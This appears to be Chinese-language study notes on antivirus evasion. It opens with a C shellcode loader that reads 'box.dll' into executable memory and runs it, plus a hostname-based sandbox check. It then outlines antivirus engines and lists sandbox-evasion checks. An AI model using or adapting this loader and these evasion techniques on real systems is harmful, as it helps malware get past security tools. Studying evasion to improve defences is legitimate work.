目录
# 一. Vs2022 下学习 windowapi(应用程序接口)的使用
# 一. Vs2022 下学习 windowapi(应用程序接口)的使用
#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#pragma warning(disable:4996)
/*
要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/
BOOL GetHostName(CHAR* hostName)
{
DWORD hostNameLen = sizeof(hostName);
if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
{
return FALSE;
}
return TRUE;
}
BOOL CheckIsSandbox()
{
CHAR hostName[MAX_PATH] = { 0 };
CHAR* sandboxName = "sandbox";
if (!GetHostName(hostName))
return FALSE;
if (!strstr(hostName, sandboxName))
{
printf("%s\n", "not in sandbox");
return TRUE;
}
return FALSE;
}
BOOL ReadPayload(char** shellcodeBuffer, PDWORD shellcodeSize)
{
FILE* file = { 0 };
CHAR* buffer = NULL;
SIZE_T file_size = { 0 };
file = fopen("box.dll", "rb"); // 打开文件
if (file == NULL) {
perror("Error opening file");
return FALSE;
}
fseek(file, 0, SEEK_END); // 获取文件大小
file_size = ftell(file);
rewind(file);
buffer = (char*)calloc(file_size, 1);
if (buffer == NULL) {
perror("Memory allocation error");
fclose(file);
return FALSE;
}
fread(buffer, sizeof(char), file_size, file); // 将读取文件内容到内存拷贝到我们申请的内存中
*shellcodeBuffer = buffer;
*shellcodeSize = (DWORD)file_size;
fclose(file);// 关闭文件
return TRUE;
}
BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
PVOID* shellcodeBuffer = NULL;
if (shellcodeSize == 0)
{
printf("Invalid shellCode length\n");
return FALSE;
}
//malloc(申请空间),calloc(申请的内存空间不能执行),virtualAlloc(),HeapAlloc()
shellcodeBuffer = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeBuffer, shellcode, shellcodeSize);
((void(*)())shellcodeBuffer)();
return TRUE;
}
int main()
{
{
CHAR* shellcodeBuffer = NULL;
DWORD shellcodeSize = 0;
if (!ReadPayload(&shellcodeBuffer, &shellcodeSize))
return 1;
ExecShellcode(shellcodeBuffer, shellcodeSize);
}
return 0;
}
运行截图:
# 二. 杀软介绍
##2.1杀软与特征检测
###2.1.1 杀软的属性:
1.指定查杀〔给定对象,检测是否含有恶意代码)
⒉.能识别恶意代码的类型
3.宏病毒,感染型的病毒,能将病毒从宿主程序剥离杀软的引擎
###2.1.2 杀软的引擎:
1.分析模块(数据格式的识别)
⒉.特征库(hash值,md5值)
3.扫描核心。
###2.1.3 静态查杀
1.特征码识别(hash,文件名,函数名,字符串)
2.云查杀(上传到云端进行检测)
3.校验和(特征码检测的一种)
4.启发式(QVM)
5.Yara规则
###2.1.4文件报毒的情况
1.下载文件就报毒(肯定是静态)
2.文件落地不会报毒,但是双击运行报毒(动态)
动态查杀:沙箱检测:配合云传。
规避沙箱〔针对沙箱环境与正常环境的区别)写一份检测代码
检测一点(内存空间小,运行时间〈沙箱环境中,时间流速较快),主机名,CPU核心数,进程数量,io设备数量)
###2.1.5 动态监控(行为检测):
1.检测服务相关
2.检测注册表
3.敏感命令(netuser.whoami
4.网络请求
5.策略组
6.防火墙
7.windowsAPI
###2.1.6 特征库识别性的二进制片段
1.基于特征码进行检测:杀毒软什的病毒库记录了一些恶意软什的特征码,检测时提取特征码和库内做比对来判断.
2.利用启发式惠意软件检测;检测进程链.
3.基于特征码进行检测:杀毒软什的病毒库记录了一些恶意软什的特征码,检测时提取特征码和库内做比对来判断.
###2.1.7 安全卫士360(无核晶)360的六大引擎
360云查杀引擎、
360启发式引擎、
QEX脚本查杀引擎、
QVMII人工智能引擎、
鲲鹏引擎、
反勒索引擎特征检测:安全云大脑(360主要检测手段)